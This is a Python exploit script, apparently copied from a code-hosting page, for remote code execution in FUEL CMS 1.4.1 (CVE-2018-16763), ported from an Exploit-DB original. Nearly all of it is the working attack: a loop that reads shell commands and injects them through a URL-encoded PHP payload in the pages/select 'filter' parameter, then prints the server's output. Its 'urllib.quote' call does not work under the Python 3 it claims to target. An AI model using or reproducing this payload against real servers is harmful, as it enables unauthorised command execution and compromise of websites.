29 lines
994 B
Python
29 lines
994 B
Python
#!/bin/env python3
|
|
#
|
|
# fuelCMS 1.4.1 - Remote Code Execution
|
|
#
|
|
# Port Author: n3m1.sys
|
|
# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
|
|
#
|
|
# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
|
|
#
|
|
# Exploit Author: 0xd0ff9
|
|
# Vendor Homepage: https://www.getfuelcms.com/
|
|
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
|
# Version: <= 1.4.1
|
|
# Tested on: Ubuntu - Apache2 - php5
|
|
# CVE : CVE-2018-16763
|
|
|
|
import requests
|
|
import urllib
|
|
|
|
url = "http://x.x.x.x:port" # Change this to the target URL
|
|
proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url)
|
|
|
|
while 1:
|
|
command = input("$: ")
|
|
exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
|
|
r = requests.get(exploit_url, proxies=proxy)
|
|
|
|
print(r.text[r.text.find("system")+6:r.text.find("<div ")])
|